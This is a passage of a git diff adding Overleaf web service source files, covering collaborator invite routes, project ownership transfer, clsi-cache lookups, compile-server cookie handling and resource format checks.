validate({ + body: Joi.object({ + email: Joi.string().required(), + privileges: Joi.string() + .valid( + PrivilegeLevels.READ_ONLY, + PrivilegeLevels.READ_AND_WRITE, + PrivilegeLevels.REVIEW + ) + .required(), + }), + }), + AuthorizationMiddleware.ensureUserCanAdminProject, + CollaboratorsInviteController.inviteToProject + ) + + webRouter.get( + '/project/:Project_id/invites', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanAdminProject, + CollaboratorsInviteController.getAllInvites + ) + + webRouter.delete( + '/project/:Project_id/invite/:invite_id', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanAdminProject, + CollaboratorsInviteController.revokeInvite + ) + + webRouter.post( + '/project/:Project_id/invite/:invite_id/resend', + RateLimiterMiddleware.rateLimit(rateLimiters.resendInvite, { + params: ['Project_id'], + }), + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanAdminProject, + CollaboratorsInviteController.generateNewInvite + ) + + webRouter.get( + '/project/:Project_id/invite/token/:token', + AnalyticsRegistrationSourceMiddleware.setSource( + 'collaboration', + 'project-invite' + ), + RateLimiterMiddleware.rateLimit(rateLimiters.viewProjectInvite), + CollaboratorsInviteController.viewInvite, + AnalyticsRegistrationSourceMiddleware.clearSource() + ) + + webRouter.post( + '/project/:Project_id/invite/token/:token/accept', + AnalyticsRegistrationSourceMiddleware.setSource( + 'collaboration', + 'project-invite' + ), + AuthenticationController.requireLogin(), + CollaboratorsInviteController.acceptInvite, + AnalyticsRegistrationSourceMiddleware.clearSource() + ) + + webRouter.get( + '/project/:Project_id/tokens', + RateLimiterMiddleware.rateLimit(rateLimiters.getProjectTokens), + AuthorizationMiddleware.ensureUserCanReadProject, + CollaboratorsController.getShareTokens + ) + }, +} diff --git a/services/web/app/src/Features/Collaborators/OwnershipTransferHandler.js b/services/web/app/src/Features/Collaborators/OwnershipTransferHandler.js new file mode 100644 index 0000000..82c9c37 --- /dev/null +++ b/services/web/app/src/Features/Collaborators/OwnershipTransferHandler.js @@ -0,0 +1,168 @@ +const logger = require('@overleaf/logger') +const { Project } = require('../../models/Project') +const ProjectGetter = require('../Project/ProjectGetter') +const UserGetter = require('../User/UserGetter') +const CollaboratorsHandler = require('./CollaboratorsHandler') +const EmailHandler = require('../Email/EmailHandler') +const Errors = require('../Errors/Errors') +const PrivilegeLevels = require('../Authorization/PrivilegeLevels') +const TpdsProjectFlusher = require('../ThirdPartyDataStore/TpdsProjectFlusher') +const ProjectAuditLogHandler = require('../Project/ProjectAuditLogHandler') +const AnalyticsManager = require('../Analytics/AnalyticsManager') + +module.exports = { + promises: { transferOwnership }, +} + +async function transferOwnership(projectId, newOwnerId, options = {}) { + const { + allowTransferToNonCollaborators, + sessionUserId, + skipEmails, + ipAddress, + } = options + + // Fetch project and user + const [project, newOwner] = await Promise.all([ + _getProject(projectId), + _getUser(newOwnerId), + ]) + + // Exit early if the transferee is already the project owner + const previousOwnerId = project.owner_ref + if (previousOwnerId.equals(newOwnerId)) { + return + } + + // Check that user is already a collaborator + if ( + !allowTransferToNonCollaborators && + !_userIsCollaborator(newOwner, project) + ) { + throw new Errors.UserNotCollaboratorError({ info: { userId: newOwnerId } }) + } + + // Track the change of ownership in BigQuery. + AnalyticsManager.recordEventForUserInBackground( + previousOwnerId, + 'project-ownership-transfer', + { projectId, newOwnerId } + ) + + // Transfer ownership + await ProjectAuditLogHandler.promises.addEntry( + projectId, + 'transfer-ownership', + sessionUserId, + ipAddress, + { previousOwnerId, newOwnerId } + ) + + // Determine which permissions to give old owner based on + // new owner's existing permissions + const newPermissions = + _getUserPermissions(newOwner, project) || PrivilegeLevels.READ_ONLY + + await _transferOwnership( + projectId, + previousOwnerId, + newOwnerId, + newPermissions + ) + + // Flush project to TPDS + await TpdsProjectFlusher.promises.flushProjectToTpds(projectId) + + // Send confirmation emails + const previousOwner = await UserGetter.promises.getUser(previousOwnerId) + if (!skipEmails) { + await _sendEmails(project, previousOwner, newOwner) + } +} + +async function _getProject(projectId) { + const project = await ProjectGetter.promises.getProject(projectId, { + owner_ref: 1, + collaberator_refs: 1, + readOnly_refs: 1, + name: 1, + }) + if (project == null) { + throw new Errors.ProjectNotFoundError({ info: { projectId } }) + } + return project +} + +async function _getUser(userId) { + const user = await UserGetter.promises.getUser(userId) + if (user == null) { + throw new Errors.UserNotFoundError({ info: { userId } }) + } + return user +} + +function _getUserPermissions(user, project) { + const collaboratorIds = project.collaberator_refs || [] + const readOnlyIds = project.readOnly_refs || [] + if (collaboratorIds.some(collaboratorId => collaboratorId.equals(user._id))) { + return PrivilegeLevels.READ_AND_WRITE + } else if ( + readOnlyIds.some(collaboratorId => collaboratorId.equals(user._id)) + ) { + return PrivilegeLevels.READ_ONLY + } +} + +function _userIsCollaborator(user, project) { + return Boolean(_getUserPermissions(user, project)) +} + +async function _transferOwnership( + projectId, + previousOwnerId, + newOwnerId, + newPermissions +) { + await CollaboratorsHandler.promises.removeUserFromProject( + projectId, + newOwnerId + ) + await Project.updateOne( + { _id: projectId }, + { $set: { owner_ref: newOwnerId } } + ).exec() + await CollaboratorsHandler.promises.addUserIdToProject( + projectId, + newOwnerId, + previousOwnerId, + newPermissions + ) +} + +async function _sendEmails(project, previousOwner, newOwner) { + if (previousOwner == null) { + // The previous owner didn't exist. This is not supposed to happen, but + // since we're changing the owner anyway, we'll just warn + logger.warn( + { projectId: project._id, ownerId: previousOwner._id }, + 'Project owner did not exist before ownership transfer' + ) + } else { + // Send confirmation emails + await Promise.all([ + EmailHandler.promises.sendEmail( + 'ownershipTransferConfirmationPreviousOwner', + { + to: previousOwner.email, + project, + newOwner, + } + ), + EmailHandler.promises.sendEmail('ownershipTransferConfirmationNewOwner', { + to: newOwner.email, + project, + previousOwner, + }), + ]) + } +} diff --git a/services/web/app/src/Features/Compile/ClsiCacheController.js b/services/web/app/src/Features/Compile/ClsiCacheController.js new file mode 100644 index 0000000..9795fd3 --- /dev/null +++ b/services/web/app/src/Features/Compile/ClsiCacheController.js @@ -0,0 +1,193 @@ +const { NotFoundError } = require('../Errors/Errors') +const { + fetchStreamWithResponse, + RequestFailedError, + fetchJson, +} = require('@overleaf/fetch-utils') +const Path = require('path') +const { pipeline } = require('stream/promises') +const logger = require('@overleaf/logger') +const ClsiCacheManager = require('./ClsiCacheManager') +const CompileController = require('./CompileController') +const { expressify } = require('@overleaf/promise-utils') +const ClsiCacheHandler = require('./ClsiCacheHandler') +const ProjectGetter = require('../Project/ProjectGetter') + +/** + * Download a file from a specific build on the clsi-cache. + * + * @param req + * @param res + * @return {Promise<*>} + */ +async function downloadFromCache(req, res) { + const { Project_id: projectId, buildId, filename } = req.params + const userId = CompileController._getUserIdForCompile(req) + const signal = AbortSignal.timeout(60 * 1000) + let location, projectName + try { + ;[{ location }, { name: projectName }] = await Promise.all([ + ClsiCacheHandler.getOutputFile( + projectId, + userId, + buildId, + filename, + signal + ), + ProjectGetter.promises.getProject(projectId, { name: 1 }), + ]) + } catch (err) { + if (err instanceof NotFoundError) { + // res.sendStatus() sends a description of the status as body. + // Using res.status().end() avoids sending that fake body. + return res.status(404).end() + } else { + throw err + } + } + + const { stream, response } = await fetchStreamWithResponse(location, { + signal, + }) + if (req.destroyed) { + // The client has disconnected already, avoid trying to write into the broken connection. + return + } + + for (const key of ['Content-Length', 'Content-Type']) { + if (response.headers.has(key)) res.setHeader(key, response.headers.get(key)) + } + const ext = Path.extname(filename) + res.attachment( + ext === '.pdf' + ? `${CompileController._getSafeProjectName({ name: projectName })}.pdf` + : filename + ) + try { + res.writeHead(response.status) + await pipeline(stream, res) + } catch (err) { + const reqAborted = Boolean(req.destroyed) + const streamingStarted = Boolean(res.headersSent) + if (!streamingStarted) { + if (err instanceof RequestFailedError) { + res.sendStatus(err.response.status) + } else { + res.sendStatus(500) + } + } + if ( + streamingStarted && + reqAborted && + err.code === 'ERR_STREAM_PREMATURE_CLOSE' + ) { + // Ignore noisy spurious error + return + } + logger.warn( + { + err, + projectId, + location, + filename, + reqAborted, + streamingStarted, + }, + 'CLSI-cache proxy error' + ) + } +} + +/** + * Prepare a compile response from the clsi-cache. + * + * @param req + * @param res + * @return {Promise<void>} + */ +async function getLatestBuildFromCache(req, res) { + const { Project_id: projectId } = req.params + const userId = CompileController._getUserIdForCompile(req) + try { + const { + internal: { location: metaLocation, zone }, + external: { isUpToDate, allFiles }, + } = await ClsiCacheManager.getLatestBuildFromCache( + projectId, + userId, + 'output.overleaf.json' + ) + + if (!isUpToDate) return res.sendStatus(410) + + const meta = await fetchJson(metaLocation, { + signal: AbortSignal.timeout(5 * 1000), + }) + + const [, editorId, buildId] = metaLocation.match( + /\/build\/([a-f0-9-]+?)-([a-f0-9]+-[a-f0-9]+)\// + ) + + let baseURL = `/project/${projectId}` + if (userId) { + baseURL += `/user/${userId}` + } + + const { ranges, contentId, clsiServerId, compileGroup, size, options } = + meta + + const outputFiles = allFiles + .filter( + path => path !== 'output.overleaf.json' && path !== 'output.tar.gz' + ) + .map(path => { + const f = { + url: `${baseURL}/build/${editorId}-${buildId}/output/${path}`, + downloadURL: `/download/project/${projectId}/build/${editorId}-${buildId}/output/cached/${path}`, + build: buildId, + path, + type: path.split('.').pop(), + } + if (path === 'output.pdf') { + Object.assign(f, { + size, + editorId, + }) + if (clsiServerId !== 'cache') { + // Enable PDF caching and attempt to download from VM first. + // (clsi VMs do not have the editorId in the path on disk, omit it). + Object.assign(f, { + url: `${baseURL}/build/${buildId}/output/output.pdf`, + ranges, + contentId, + }) + } + } + return f + }) + let { pdfCachingMinChunkSize, pdfDownloadDomain } = + await CompileController._getSplitTestOptions(req, res) + pdfDownloadDomain += `/zone/${zone}` + res.json({ + fromCache: true, + status: 'success', + outputFiles, + compileGroup, + clsiServerId, + pdfDownloadDomain, + pdfCachingMinChunkSize, + options, + }) + } catch (err) { + if (err instanceof NotFoundError) { + res.sendStatus(404) + } else { + throw err + } + } +} + +module.exports = { + downloadFromCache: expressify(downloadFromCache), + getLatestBuildFromCache: expressify(getLatestBuildFromCache), +} diff --git a/services/web/app/src/Features/Compile/ClsiCacheHandler.js b/services/web/app/src/Features/Compile/ClsiCacheHandler.js new file mode 100644 index 0000000..14c742d --- /dev/null +++ b/services/web/app/src/Features/Compile/ClsiCacheHandler.js @@ -0,0 +1,217 @@ +const _ = require('lodash') +const { + fetchNothing, + fetchRedirectWithResponse, + RequestFailedError, +} = require('@overleaf/fetch-utils') +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const OError = require('@overleaf/o-error') +const { NotFoundError, InvalidNameError } = require('../Errors/Errors') + +function validateFilename(filename) { + if ( + ![ + 'output.blg', + 'output.log', + 'output.pdf', + 'output.synctex.gz', + 'output.overleaf.json', + 'output.tar.gz', + ].includes(filename) || + filename.endsWith('.blg') + ) { + throw new InvalidNameError('bad filename') + } +} + +/** + * Clear the cache on all clsi-cache instances. + * + * @param projectId + * @param userId + * @return {Promise<void>} + */ +async function clearCache(projectId, userId) { + let path = `/project/${projectId}` + if (userId) { + path += `/user/${userId}` + } + path += '/output' + + await Promise.all( + Settings.apis.clsiCache.instances.map(async ({ url, zone }) => { + const u = new URL(url) + u.pathname = path + try { + await fetchNothing(u, { + method: 'DELETE', + signal: AbortSignal.timeout(15_000), + }) + } catch (err) { + throw OError.tag(err, 'clear clsi-cache', { url, zone }) + } + }) + ) +} + +/** + * Get an output file from a specific build. + * + * @param projectId + * @param userId + * @param buildId + * @param filename + * @param signal + * @return {Promise<{size: number, zone: string, location: string, lastModified: Date, allFiles: string[]}>} + */ +async function getOutputFile( + projectId, + userId, + buildId, + filename, + signal = AbortSignal.timeout(15_000) +) { + validateFilename(filename) + if (!/^[a-f0-9-]+$/.test(buildId)) { + throw new InvalidNameError('bad buildId') + } + + let path = `/project/${projectId}` + if (userId) { + path += `/user/${userId}` + } + path += `/build/${buildId}/search/output/${filename}` + return getRedirectWithFallback(projectId, userId, path, signal) +} + +/** + * Get an output file from the most recent build. + * + * @param projectId + * @param userId + * @param filename + * @param signal + * @return {Promise<{size: number, zone: string, location: string, lastModified: Date, allFiles: string[]}>} + */ +async function getLatestOutputFile( + projectId, + userId, + filename, + signal = AbortSignal.timeout(15_000) +) { + validateFilename(filename) + + let path = `/project/${projectId}` + if (userId) { + path += `/user/${userId}` + } + path += `/latest/output/${filename}` + return getRedirectWithFallback(projectId, userId, path, signal) +} + +/** + * Request the given path from any of the clsi-cache instances. + * + * Some of them might be down temporarily. Try the next one until we receive a redirect or 404. + * + * This function is similar to the Coordinator in the clsi-cache, notable differences: + * - all the logic for sorting builds is in clsi-cache (re-used by clsi and web) + * - fan-out (1 client performs lookup on many clsi-cache instances) is "central" in clsi-cache, resulting in better connection re-use + * - we only cross the k8s cluster boundary via an internal GCLB once ($$$) + * + * @param projectId + * @param userId + * @param path + * @param signal + * @return {Promise<{size: number, zone: string, location: string, lastModified: Date, allFiles: string[]}>} + */ +async function getRedirectWithFallback( + projectId, + userId, + path, + signal = AbortSignal.timeout(15_000) +) { + // Avoid hitting the same instance first all the time. + const instances = _.shuffle(Settings.apis.clsiCache.instances) + for (const { url, zone } of instances) { + const u = new URL(url) + u.pathname = path + try { + const { + location, + response: { headers }, + } = await fetchRedirectWithResponse(u, { + signal, + }) + // Success, return the cache entry. + return { + location, + zone: headers.get('X-Zone'), + lastModified: new Date(headers.get('X-Last-Modified')), + size: parseInt(headers.get('X-Content-Length'), 10), + allFiles: JSON.parse(headers.get('X-All-Files')), + } + } catch (err) { + if (err instanceof RequestFailedError && err.response.status === 404) { + break // No clsi-cache instance has cached something for this project/user. + } + logger.warn( + { err, projectId, userId, url, zone }, + 'getLatestOutputFile from clsi-cache failed' + ) + // This clsi-cache instance is down, try the next backend. + } + } + throw new NotFoundError('nothing cached yet') +} + +/** + * Populate the clsi-cache for the given project/user with the provided source + * + * This is either another project, or a template (id+version). + * + * @param projectId + * @param userId + * @param sourceProjectId + * @param templateId + * @param templateVersionId + * @param lastUpdated + * @param zone + * @param signal + * @return {Promise<void>} + */ +async function prepareCacheSource( + projectId, + userId, + { sourceProjectId, templateId, templateVersionId, lastUpdated, zone, signal } +) { + const url = new URL( + `/project/${projectId}/user/${userId}/import-from`, + Settings.apis.clsiCache.instances.find(i => i.zone === zone).url + ) + try { + await fetchNothing(url, { + method: 'POST', + json: { + sourceProjectId, + lastUpdated, + templateId, + templateVersionId, + }, + signal, + }) + } catch (err) { + if (err instanceof RequestFailedError && err.response.status === 404) { + throw new NotFoundError() + } + throw err + } +} + +module.exports = { + clearCache, + getOutputFile, + getLatestOutputFile, + prepareCacheSource, +} diff --git a/services/web/app/src/Features/Compile/ClsiCacheManager.js b/services/web/app/src/Features/Compile/ClsiCacheManager.js new file mode 100644 index 0000000..1090b9f --- /dev/null +++ b/services/web/app/src/Features/Compile/ClsiCacheManager.js @@ -0,0 +1,106 @@ +const { NotFoundError } = require('../Errors/Errors') +const ClsiCacheHandler = require('./ClsiCacheHandler') +const DocumentUpdaterHandler = require('../DocumentUpdater/DocumentUpdaterHandler') +const ProjectGetter = require('../Project/ProjectGetter') +const SplitTestHandler = require('../SplitTests/SplitTestHandler') + +/** + * Get the most recent build and metadata + * + * Internal: internal metadata; External: fine to send to user as-is. + * + * @param projectId + * @param userId + * @param filename + * @param signal + * @return {Promise<{internal: {zone: string, location: string}, external: {isUpToDate: boolean, lastUpdated: Date, size: number, allFiles: string[]}}>} + */ +async function getLatestBuildFromCache(projectId, userId, filename, signal) { + const [ + { location, lastModified: lastCompiled, zone, size, allFiles }, + lastUpdatedInRedis, + { lastUpdated: lastUpdatedInMongo }, + ] = await Promise.all([ + ClsiCacheHandler.getLatestOutputFile(projectId, userId, filename, signal), + DocumentUpdaterHandler.promises.getProjectLastUpdatedAt(projectId), + ProjectGetter.promises.getProject(projectId, { lastUpdated: 1 }), + ]) + + const lastUpdated = + lastUpdatedInRedis > lastUpdatedInMongo + ? lastUpdatedInRedis + : lastUpdatedInMongo + const isUpToDate = lastCompiled >= lastUpdated + + return { + internal: { + location, + zone, + }, + external: { + isUpToDate, + lastUpdated, + size, + allFiles, + }, + } +} + +/** + * Collect metadata and prepare the clsi-cache for the given project. + * + * @param projectId + * @param userId + * @param sourceProjectId + * @param templateId + * @param templateVersionId + * @return {Promise<void>} + */ +async function prepareClsiCache( + projectId, + userId, + { sourceProjectId, templateId, templateVersionId } +) { + const { variant } = await SplitTestHandler.promises.getAssignmentForUser( + userId, + 'copy-clsi-cache' + ) + if (variant !== 'enabled') return + const signal = AbortSignal.timeout(5_000) + let lastUpdated + let zone = 'b' // populate template data on zone b + if (sourceProjectId) { + try { + ;({ + internal: { zone }, + external: { lastUpdated }, + } = await getLatestBuildFromCache( + sourceProjectId, + userId, + 'output.tar.gz', + signal + )) + } catch (err) { + if (err instanceof NotFoundError) return // nothing cached yet + throw err + } + } + try { + await ClsiCacheHandler.prepareCacheSource(projectId, userId, { + sourceProjectId, + templateId, + templateVersionId, + zone, + lastUpdated, + signal, + }) + } catch (err) { + if (err instanceof NotFoundError) return // nothing cached yet/expired. + throw err + } +} + +module.exports = { + getLatestBuildFromCache, + prepareClsiCache, +} diff --git a/services/web/app/src/Features/Compile/ClsiCookieManager.js b/services/web/app/src/Features/Compile/ClsiCookieManager.js new file mode 100644 index 0000000..fc542fe --- /dev/null +++ b/services/web/app/src/Features/Compile/ClsiCookieManager.js @@ -0,0 +1,250 @@ +const { URL, URLSearchParams } = require('url') +const OError = require('@overleaf/o-error') +const Settings = require('@overleaf/settings') +const request = require('request').defaults({ timeout: 30 * 1000 }) +const RedisWrapper = require('../../infrastructure/RedisWrapper') +const Cookie = require('cookie') +const logger = require('@overleaf/logger') +const Metrics = require('@overleaf/metrics') +const { promisifyAll } = require('@overleaf/promise-utils') + +const clsiCookiesEnabled = (Settings.clsiCookie?.key ?? '') !== '' + +const rclient = RedisWrapper.client('clsi_cookie') +let rclientSecondary +if (Settings.redis.clsi_cookie_secondary != null) { + rclientSecondary = RedisWrapper.client('clsi_cookie_secondary') +} + +module.exports = function (backendGroup) { + const cookieManager = { + buildKey(projectId, userId) { + if (backendGroup != null) { + return `clsiserver:${backendGroup}:${projectId}:${userId}` + } else { + return `clsiserver:${projectId}:${userId}` + } + }, + + getServerId( + projectId, + userId, + compileGroup, + compileBackendClass, + callback + ) { + if (!clsiCookiesEnabled) { + return callback() + } + rclient.get(this.buildKey(projectId, userId), (err, serverId) => { + if (err) { + return callback(err) + } + if (serverId == null || serverId === '') { + this._populateServerIdViaRequest( + projectId, + userId, + compileGroup, + compileBackendClass, + callback + ) + } else { + callback(null, serverId) + } + }) + }, + + _populateServerIdViaRequest( + projectId, + userId, + compileGroup, + compileBackendClass, + callback + ) { + const u = new URL(`${Settings.apis.clsi.url}/project/${projectId}/status`) + u.search = new URLSearchParams({ + compileGroup, + compileBackendClass, + }).toString() + request.post(u.href, (err, res, body) => { + if (err) { + OError.tag(err, 'error getting initial server id for project', { + project_id: projectId, + }) + return callback(err) + } + if (!clsiCookiesEnabled) { + return callback() + } + const serverId = this._parseServerIdFromResponse(res) + this.setServerId( + projectId, + userId, + compileGroup, + compileBackendClass, + serverId, + null, + function (err) { + if (err) { + logger.warn( + { err, projectId }, + 'error setting server id via populate request' + ) + } + callback(err, serverId) + } + ) + }) + }, + + _parseServerIdFromResponse(response) { + const cookies = Cookie.parse(response.headers['set-cookie']?.[0] || '') + return cookies?.[Settings.clsiCookie.key] + }, + + checkIsLoadSheddingEvent(clsiserverid, compileGroup, compileBackendClass) { + request.get( + { + url: `${Settings.apis.clsi.url}/instance-state`, + qs: { clsiserverid, compileGroup, compileBackendClass }, + }, + (err, res, body) => { + if (err) { + Metrics.inc('clsi-lb-switch-backend', 1, { + status: 'error', + }) + logger.warn({ err, clsiserverid }, 'cannot probe clsi VM') + return + } + const isStillRunning = + res.statusCode === 200 && body === `${clsiserverid},UP\n` + Metrics.inc('clsi-lb-switch-backend', 1, { + status: isStillRunning ? 'load-shedding' : 'cycle', + }) + } + ) + }, + + _getTTLInSeconds(clsiServerId) { + return (clsiServerId || '').includes('-reg-') + ? Settings.clsiCookie.ttlInSecondsRegular + : Settings.clsiCookie.ttlInSeconds + }, + + setServerId( + projectId, + userId, + compileGroup, + compileBackendClass, + serverId, + previous, + callback + ) { + if (!clsiCookiesEnabled) { + return callback() + } + if (serverId == null) { + // We don't get a cookie back if it hasn't changed + return rclient.expire( + this.buildKey(projectId, userId), + this._getTTLInSeconds(previous), + err => callback(err) + ) + } + if (!previous) { + // Initial assignment of a user+project or after clearing cache. + Metrics.inc('clsi-lb-assign-initial-backend') + } else { + this.checkIsLoadSheddingEvent( + previous, + compileGroup, + compileBackendClass + ) + } + if (rclientSecondary != null) { + this._setServerIdInRedis( + rclientSecondary, + projectId, + userId, + serverId, + () => {} + ) + } + this._setServerIdInRedis(rclient, projectId, userId, serverId, err => + callback(err) + ) + }, + + _setServerIdInRedis(rclient, projectId, userId, serverId, callback) { + rclient.setex( + this.buildKey(projectId, userId), + this._getTTLInSeconds(serverId), + serverId, + callback + ) + }, + + clearServerId(projectId, userId, callback) { + if (!clsiCookiesEnabled) { + return callback() + } + rclient.del(this.buildKey(projectId, userId), err => { + if (err) { + // redis errors need wrapping as the instance may be shared + return callback( + new OError( + 'Failed to clear clsi persistence', + { projectId, userId }, + err + ) + ) + } else { + return callback() + } + }) + }, + + getCookieJar( + projectId, + userId, + compileGroup, + compileBackendClass, + callback + ) { + if (!clsiCookiesEnabled) { + return callback(null, request.jar(), undefined) + } + this.getServerId( + projectId, + userId, + compileGroup, + compileBackendClass, + (err, serverId) => { + if (err != null) { + OError.tag(err, 'error getting server id', { + project_id: projectId, + }) + return callback(err) + } + const serverCookie = request.cookie( + `${Settings.clsiCookie.key}=${serverId}` + ) + const jar = request.jar() + jar.setCookie(serverCookie, Settings.apis.clsi.url) + callback(null, jar, serverId) + } + ) + }, + } + cookieManager.promises = promisifyAll(cookieManager, { + without: [ + '_parseServerIdFromResponse', + 'checkIsLoadSheddingEvent', + '_getTTLInSeconds', + ], + multiResult: { + getCookieJar: ['jar', 'clsiServerId'], + }, + }) + return cookieManager +} diff --git a/services/web/app/src/Features/Compile/ClsiFormatChecker.js b/services/web/app/src/Features/Compile/ClsiFormatChecker.js new file mode 100644 index 0000000..1828f2f --- /dev/null +++ b/services/web/app/src/Features/Compile/ClsiFormatChecker.js @@ -0,0 +1,89 @@ +/* eslint-disable + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let ClsiFormatChecker +const _ = require('lodash') +const async = require('async') +const settings = require('@overleaf/settings') +const { promisifyAll } = require('@overleaf/promise-utils') + +module.exports = ClsiFormatChecker = { + checkRecoursesForProblems(resources, callback) { + const jobs = { + conflictedPaths(cb) { + return ClsiFormatChecker._checkForConflictingPaths(resources, cb) + }, + + sizeCheck(cb) { + return ClsiFormatChecker._checkDocsAreUnderSizeLimit(resources, cb) + }, + } + + return async.series(jobs, function (err, problems) { + if (err != null) { + return callback(err) + } + + problems = _.omitBy(problems, _.isEmpty) + + if (_.isEmpty(problems)) { + return callback() + } else { + return callback(null, problems) + } + }) + }, + + _checkForConflictingPaths(resources, callback) { + const paths = resources.map(resource => resource.path) + + const conflicts = _.filter(paths, function (path) { + const matchingPaths = _.filter( + paths, + checkPath => checkPath.indexOf(path + '/') !== -1 + ) + + return matchingPaths.length > 0 + }) + + const conflictObjects = conflicts.map(conflict => ({ path: conflict })) + + return callback(null, conflictObjects) + }, + + _checkDocsAreUnderSizeLimit(resources, callback) { + const sizeLimit = 1000 * 1000 * settings.compileBodySizeLimitMb + + let totalSize = 0 + + let sizedResources = resources.map(function (resource) { + const result = { path: resource.path } + if (resource.content != null) { + result.size = resource.content.replace(/\n/g, '').length + result.kbSize = Math.ceil(result.size / 1000) + } else { + result.size = 0 + } + totalSize += result.size + return result + }) + + const tooLarge = totalSize > sizeLimit + if (!tooLarge) { + return callback() + } else { + sizedResources = _.sortBy(sizedResources, 'size').reverse().slice(0, 10) + return callback(null, { resources: sizedResources, totalSize }) + } + }, +} + +module.exports.promises = promisifyAll(module.exports) diff --git a/services/web/app/src/Features/Compile/ClsiManager.js b/services/web/app/src/Features/Compile/ClsiManager.js new file mode 100644 index 0000000..021f102 --- /dev/null +++ b/services/web/app/src/Features/Compile/ClsiManager.js @@ -0,0 +1,873 @@ +const { callbackify } = require('util') +const { callbackifyMultiResult } = require('@overleaf/promise-utils') +const { + fetchString, + fetchStringWithResponse, + fetchStream, + RequestFailedError, +} = require('@overleaf/fetch-utils') +const Settings = require('@overleaf/settings') +const ProjectGetter = require('../Project/ProjectGetter') +const ProjectEntityHandler = require('../Project/ProjectEntityHandler') +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const { Cookie } = require('tough-cookie') +const ClsiCookieManager = require('./ClsiCookieManager')( + Settings.apis.clsi?.backendGroupName +) +const Features = require('../../infrastructure/Features') +const NewBackendCloudClsiCookieManager = require('./ClsiCookieManager')( + Settings.apis.clsi_new?.backendGroupName +) +const ClsiStateManager = require('./ClsiStateManager') +const _ = require('lodash') +const ClsiFormatChecker = require('./ClsiFormatChecker') +const DocumentUpdaterHandler = require('../DocumentUpdater/DocumentUpdaterHandler') +const Metrics = require('@overleaf/metrics') +const Errors = require('../Errors/Errors') +const ClsiCacheHandler = require('./ClsiCacheHandler') +const { getBlobLocation } = require('../History/HistoryManager') + +const VALID_COMPILERS = ['pdflatex', 'latex', 'xelatex', 'lualatex'] +const OUTPUT_FILE_TIMEOUT_MS = 60000 +const CLSI_COOKIES_ENABLED = (Settings.clsiCookie?.key ?? '') !== '' + +// The timeout in services/clsi/app.js is 10 minutes, so we'll be on the safe side with 12 minutes +const COMPILE_REQUEST_TIMEOUT_MS = 12 * 60 * 1000 + +function collectMetricsOnBlgFiles(outputFiles) { + let topLevel = 0 + let nested = 0 + for (const outputFile of outputFiles) { + if (outputFile.type === 'blg') { + if (outputFile.path.includes('/')) { + nested++ + } else { + topLevel++ + } + } + } + Metrics.count('blg_output_file', topLevel, 1, { path: 'top-level' }) + Metrics.count('blg_output_file', nested, 1, { path: 'nested' }) +} + +async function sendRequest(projectId, userId, options) { + if (options == null) { + options = {} + } + let result = await sendRequestOnce(projectId, userId, options) + if (result.status === 'conflict') { + // Try again, with a full compile + result = await sendRequestOnce(projectId, userId, { + ...options, + syncType: 'full', + }) + } else if (result.status === 'unavailable') { + result = await sendRequestOnce(projectId, userId, { + ...options, + syncType: 'full', + forceNewClsiServer: true, + }) + } + return result +} + +async function sendRequestOnce(projectId, userId, options) { + let req + try { + req = await _buildRequest(projectId, options) + } catch (err) { + if (err.message === 'no main file specified') { + return { + status: 'validation-problems', + validationProblems: { mainFile: err.message }, + } + } else { + throw OError.tag(err, 'Could not build request to CLSI', { + projectId, + options, + }) + } + } + return await _sendBuiltRequest(projectId, userId, req, options) +} + +// for public API requests where there is no project id +async function sendExternalRequest(submissionId, clsiRequest, options) { + if (options == null) { + options = {} + } + return await _sendBuiltRequest(submissionId, null, clsiRequest, options) +} + +async function stopCompile(projectId, userId, options) { + if (options == null) { + options = {} + } + const { compileBackendClass, compileGroup } = options + const url = _getCompilerUrl( + compileBackendClass, + compileGroup, + projectId, + userId, + 'compile/stop' + ) + const opts = { method: 'POST' } + await _makeRequest( + projectId, + userId, + compileGroup, + compileBackendClass, + url, + opts + ) +} + +async function deleteAuxFiles(projectId, userId, options, clsiserverid) { + if (options == null) { + options = {} + } + const { compileBackendClass, compileGroup } = options + const url = _getCompilerUrl( + compileBackendClass, + compileGroup, + projectId, + userId + ) + const opts = { + method: 'DELETE', + } + + try { + await _makeRequestWithClsiServerId( + projectId, + userId, + compileGroup, + compileBackendClass, + url, + opts, + clsiserverid + ) + } finally { + // always clear the clsi-cache + try { + await ClsiCacheHandler.clearCache(projectId, userId) + } catch (err) { + logger.warn({ err, projectId, userId }, 'purge clsi-cache failed') + } + + // always clear the project state from the docupdater, even if there + // was a problem with the request to the clsi + try { + await DocumentUpdaterHandler.promises.clearProjectState(projectId) + } finally { + await ClsiCookieManager.promises.clearServerId(projectId, userId) + } + } +} + +async function _sendBuiltRequest(projectId, userId, req, options, callback) { + if (options.forceNewClsiServer) { + await ClsiCookieManager.promises.clearServerId(projectId, userId) + } + const validationProblems = + await ClsiFormatChecker.promises.checkRecoursesForProblems( + req.compile?.resources + ) + if (validationProblems != null) { + logger.debug( + { projectId, validationProblems }, + 'problems with users latex before compile was attempted' + ) + return { + status: 'validation-problems', + validationProblems, + } + } + + const { response, clsiServerId } = await _postToClsi( + projectId, + userId, + req, + options.compileBackendClass, + options.compileGroup + ) + + const outputFiles = _parseOutputFiles( + projectId, + response && response.compile && response.compile.outputFiles + ) + collectMetricsOnBlgFiles(outputFiles) + const compile = response?.compile || {} + return { + status: compile.status, + outputFiles, + clsiServerId, + buildId: compile.buildId, + stats: compile.stats, + timings: compile.timings, + outputUrlPrefix: compile.outputUrlPrefix, + } +} + +async function _makeRequestWithClsiServerId( + projectId, + userId, + compileGroup, + compileBackendClass, + url, + opts, + clsiserverid +) { + if (clsiserverid) { + // ignore cookies and newBackend, go straight to the clsi node + url.searchParams.set('compileGroup', compileGroup) + url.searchParams.set('compileBackendClass', compileBackendClass) + url.searchParams.set('clsiserverid', clsiserverid) + + let body + try { + body = await fetchString(url, opts) + } catch (err) { + throw OError.tag(err, 'error making request to CLSI', { + userId, + projectId, + }) + } + + let json + try { + json = JSON.parse(body) + } catch (err) { + // some responses are 